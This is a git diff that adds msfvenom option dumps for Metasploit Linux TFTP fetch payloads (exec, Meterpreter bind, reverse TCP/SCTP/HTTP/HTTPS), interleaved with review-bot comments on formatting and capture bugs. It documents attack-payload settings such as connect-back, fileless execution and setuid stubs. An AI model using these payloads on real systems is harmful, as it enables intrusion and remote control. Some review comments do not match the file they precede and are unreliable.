Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x64-exec.txt b/msfvenom/payload_options/cmd-linux-tftp-x64-exec.txt new file mode 100644 index 0000000..24e25e7 --- /dev/null 
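Review bot: the 'Name:' field here is just 'TFTP Fetch' and the Description is the single sentence 'Fetch and execute a PPC64LE payload from a TFTP server.', whereas the cmd-shell files in this patch compose the name from both halves ('TFTP Fetch, Linux Command Shell, Reverse TCP Inline') and append the inner payload's description; the adapter is dropping the Meterpreter payload's name and description, so a reader cannot tell from this file what is fetched. That is a fix for the adapter's name/description composition rather than for the text file. The 'Provided by' list in this file is intact, which confirms the interleaving in the http/https files is a capture problem and not a module problem.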
+++ b/msfvenom/payload_options/cmd-linux-tftp-x64-exec.txt 
@@ -0,0 +1,71 @@ + + Name: TFTP Fetch, Linux Execute Command + Module: payload/cmd/linux/tftp/x64/exec + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + ricky + Geyslan G. Bem + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD no The command string to execute +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME VjCIbhhBJ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from a TFTP server. 
+ Execute an arbitrary command or just a /bin/sh shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + NullFreeVersion false yes Null-free shellcode version + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x64-meterpreter-bind_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x64-meterpreter-bind_tcp.txt new file mode 100644 index 0000000..38d0ece --- /dev/null 
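Review bot: 'FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload' together with 'FETCH_DELETE false yes' means the default configuration writes the fetched binary under a random name (here 'VjCIbhhBJ') into whatever directory the invoking shell is in and leaves it there; the description should say that './' is relative to the shell's working directory, and that a file with a random alphabetic name in that directory is the on-disk artifact this payload leaves by default, which is the detail defenders reading these files will look for. Two lesser points: 'CMD no The command string to execute' is optional with no default while the Description says 'Execute an arbitrary command or just a /bin/sh shell', so the text should state that an empty CMD means /bin/sh if that is the behaviour, and the second Description sentence lacks the terminating period the first one has.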
+++ b/msfvenom/payload_options/cmd-linux-tftp-x64-meterpreter-bind_tcp.txt 
@@ -0,0 +1,97 @@ + + Name: TFTP Fetch, Bind TCP Stager + Module: payload/cmd/linux/tftp/x64/meterpreter/bind_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Brent Cook + ricky + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME VcBbaFZqa no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from a TFTP server. + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is 
available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x64-meterpreter-reverse_sctp.txt b/msfvenom/payload_options/cmd-linux-tftp-x64-meterpreter-reverse_sctp.txt new file mode 100644 index 0000000..144d1c3 --- /dev/null 
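Review bot: The header of the cmd/linux/tftp/x64/meterpreter/bind_tcp dump reads `Platform: Linux, Linux`, while the stageless dumps in this patch (meterpreter_reverse_http, _https, _tcp) show a single `Linux`. The duplication appears only in the staged payloads, so it looks like the stager's and the stage's platform lists being concatenated rather than deduplicated; worth confirming whether msfvenom prints this or the dump script introduces it. The FETCH_FILENAME value (VcBbaFZqa) is again random and should be normalized.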
+++ b/msfvenom/payload_options/cmd-linux-tftp-x64-meterpreter-reverse_sctp.txt 
@@ -0,0 +1,103 @@ + + Name: TFTP Fetch, Reverse SCTP Stager + Module: payload/cmd/linux/tftp/x64/meterpreter/reverse_sctp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 111 + +Evasion options for payload/cmd/linux/tftp/x64/meterpreter/reverse_sctp: +========================= + +tman@sempervictus> + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME HxVPqzQcPUH no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from a TFTP server. 
+ Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. 
+ EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no 
Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x64-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-x64-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..7a0b191 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x64-meterpreter-reverse_tcp.txt 
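Review bot: The cmd/linux/tftp/x64/meterpreter/reverse_sctp dump is missing its `Rank:` and `Provided by:` lines, and the text `tman@sempervictus>` sits by itself under the `Evasion options for ...` header where it does not belong; that string is presumably an author entry from the `Provided by:` list that has been interleaved with the evasion-options header. The same interleaving shows up in the reverse_http and reverse_https dumps (`timwr` under the evasion header, `Provided by:` empty). This looks like stdout and stderr of msfvenom being captured into one stream without ordering; the generator should capture them separately (or discard the evasion-options output) and the affected files should be regenerated.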
@@ -0,0 +1,103 @@ + + Name: TFTP Fetch, Reverse TCP Stager + Module: payload/cmd/linux/tftp/x64/meterpreter/reverse_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 105 + +Evasion options for payload/cmd/linux/tftp/x64/meterpreter/reverse_tcp: +========================= + + + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME vtFesbcFZ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from a TFTP server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see 
https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x64-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-tftp-x64-meterpreter_reverse_http.txt new file mode 100644 index 0000000..49ed243 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x64-meterpreter_reverse_http.txt 
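Review bot: Same capture problem as in the reverse_sctp file: the cmd/linux/tftp/x64/meterpreter/reverse_tcp dump has an empty `Evasion options for ...:` block in the place where `Rank:` and `Provided by:` should be, so authorship information is lost and the file should be regenerated once the generator is fixed. Note also that FETCH_SRVHOST is Required=no for this reverse payload but Required=yes for exec and bind_tcp earlier in the patch; the dump itself gives no hint why, so a user reading these files cannot tell which of FETCH_SRVHOST and LHOST they must set.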
@@ -0,0 +1,103 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/x64/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/tftp/x64/meterpreter_reverse_http: +========================= + + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME HRmFbVJGsD no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the 
payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-x64-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-tftp-x64-meterpreter_reverse_https.txt new file mode 100644 index 0000000..2c17f83 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-x64-meterpreter_reverse_https.txt 
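Review bot: In the cmd/linux/tftp/x64/meterpreter_reverse_http dump, FETCH_SRVPORT and LPORT both default to 8080. With the defaults unchanged and FETCH_SRVHOST unset, the fetch server and the HTTP handler would contend for the same port on the same host, so anyone copying these defaults has to change one of them (the https variant avoids the clash with LPORT 8443). Separately, the HttpUnknownRequestResponse default is a raw HTML document (the `It works!` body wrapped in markup) and is the one Current Setting in these files that contains markup; it is shown here broken across lines, so check that the committed file keeps it on a single line, since everything else in the dump is one option per line and a line-oriented consumer will misparse it otherwise.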
@@ -0,0 +1,105 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/x64/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/tftp/x64/meterpreter_reverse_https: +========================= + + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME NfyFMMWn no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

